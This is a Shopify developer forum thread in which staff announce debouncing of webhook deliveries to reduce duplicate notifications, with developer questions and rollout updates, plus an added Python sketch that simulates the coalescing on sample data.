Upcoming improvements to Webhooks

Shopify Staff

Update Jan 12th below:

The de-bounce change is now live for all shops.  Please keep leaving your questions and concerns around this new improvement in this thread.  Feel free to share some stats as well.

As for other webhook-related issues, feel free to keep bringing them up as well; just note that these improvements are solely based on eliminating duplicates and do not alter the contents of any existing webhooks.

 

Update Jan 4th below:

We are going to be starting a tiered rollout early next week for the webhook improvements.

The changes will be what is described in the original post, with the exception that we will exclude any webhook topics that are /add or /create.

As always we look forward to your feedback before and after this feature has rolled out.  Feel free to reply with any questions or concerns.

 

Hey All,

We are introducing a number of improvements to how Shopify delivers webhooks.  Our existing webhooks implementation offers a poor experience for app developers on a number of dimensions:

  1. Flooding.

    • A spike of requests on Shopify's side causes a spike of webhooks to be sent to apps (e.g., a flash sale). Apps have to design against this.

  2. Duplication.

    • Our webhook implementation often sends duplicate webhook payloads in a short period of time. For app developers, this translates to increased hardware requirements for processing as well as additional contention for the affected resources.

We are introducing changes to improve the above issues that will have a twofold impact: a net reduction in webhooks received from Shopify, as well as a short delay between an action and the webhook being sent in order to ensure that only the most recent state is communicated to your app.

For example, the following actions are performed in quick succession:

  1. A product is created

  2. A title is added to the product

  3. A description is added to the product

  4. A price is added to the product

Previously the behaviour would result in a products/create webhook, and then three subsequent products/update webhooks, not necessarily in the order of changes made.

After introducing these improvements, a products/create webhook would be sent, and then a single products/update webhook with the most up-to-date payload would be sent after a short delay.

If you have questions or concerns about these changes, please comment in the thread below so we can address them prior to launch.

 

All the best,

Ryan O

Developer Experience

Shopify

Developer Experience @ Shopify
3 Likes
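The coalescing behaviour described in the post above, sketched as an added example (not Shopify's code and not part of the original post). The 5-second window, the timer fixed from the first held change, and the `Change` and `debounce` names are assumptions; the thread only says "a short delay" and that /add and /create topics are excluded.

```python
from dataclasses import dataclass

WINDOW_MS = 5000                        # assumed; the post only says "a short delay"
EXEMPT_SUFFIXES = ("/create", "/add")   # topics excluded per the Jan 4th update

@dataclass
class Change:
    at_ms: int         # when the change happened
    topic: str         # e.g. "products/update"
    resource_id: int
    state: dict        # full resource state after this change

def debounce(changes, window_ms=WINDOW_MS):
    """Return the deliveries as (send_at_ms, topic, resource_id, state) tuples."""
    sent, pending = [], {}              # pending: key -> (deadline_ms, latest Change)
    for ch in sorted(changes, key=lambda c: c.at_ms):
        # Deliver every held webhook whose window closed before this change.
        for key in [k for k, (due, _) in pending.items() if due <= ch.at_ms]:
            due, last = pending.pop(key)
            sent.append((due, last.topic, last.resource_id, last.state))
        if ch.topic.endswith(EXEMPT_SUFFIXES):
            sent.append((ch.at_ms, ch.topic, ch.resource_id, ch.state))
            continue
        key = (ch.topic, ch.resource_id)
        # Assumption: the window is fixed from the first held change, so the
        # delay is bounded; later changes only replace the state to be sent.
        due = pending[key][0] if key in pending else ch.at_ms + window_ms
        pending[key] = (due, ch)
    for due, last in pending.values():  # flush whatever is still held
        sent.append((due, last.topic, last.resource_id, last.state))
    return sorted(sent, key=lambda d: d[0])

# Constructed sample: the four actions from the post, plus one later edit.
SAMPLE = [
    Change(0,     "products/create", 1, {"id": 1}),
    Change(200,   "products/update", 1, {"id": 1, "title": "Mug"}),
    Change(500,   "products/update", 1, {"id": 1, "title": "Mug", "body": "Blue"}),
    Change(900,   "products/update", 1, {"id": 1, "title": "Mug", "body": "Blue", "price": "9.00"}),
    Change(20000, "products/update", 1, {"id": 1, "title": "Mug", "body": "Blue", "price": "8.00"}),
]

if __name__ == "__main__":
    for delivery in debounce(SAMPLE):
        print(delivery)
```

The three updates made within the window collapse into one delivery carrying the final state, while the create is sent immediately and the later edit gets its own delivery.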
Explorer

Great improvements.

I experienced that for a single shop attribute change, the shop/update webhook gets fired four times (details in this post). Is this going to be improved, so that it gets fired only once, too?

Looga.io
0 Likes
New Member

Awesome! We were looking for updates about address changes. I thought that customer.updated would be that -- but that was firing on every new order. 

Thanks!

0 Likes
Shopify Staff

Hi Felix,

The issue you describe is indeed one of the scenarios this change is aiming to fix.  Thanks for your feedback!

Ryan

Developer Experience @ Shopify
0 Likes
Shopify Partner

Hi Ryan,

That's a great update!

Do all webhook topics get the delays, or only the ones that can have an issue like the one you described? I'm most interested in the orders/create webhook, as a delay on that one would have a very negative impact on loads of apps. :)

And do you have more info on the timeline of the updates?

Cheers,

Harold

0 Likes
Trailblazer

Awesome news!

On a very related note, I'm still trying to figure out: does the [orders/updated] webhook fire whenever any other [orders/*] webhook fires? No point subscribing to all other topics if that is the case...

0 Likes
New Member

Hi there,
Wonderful!
Since this morning we have been having some issues with the app deletion webhook. With some test accounts it works correctly, with others not.
It started more or less today; do you think it is a consequence of your webhooks restructuring process?

0 Likes
Shopify Staff

Thanks for all the feedback, please keep leaving questions and comments.  We are reading and discussing all of the feedback we've gotten.

 

Ryan

Developer Experience @ Shopify
0 Likes
Shopify Staff

Hey all,

We are going to be starting a tiered rollout early next week for the webhook improvements.

The changes will be what is described in the original post, with the exception that we will exclude any webhook topics that are /add or /create.

As always we look forward to your feedback before and after this feature has rolled out.  Feel free to reply with any questions or concerns.

 

Ryan

 

Developer Experience @ Shopify
0 Likes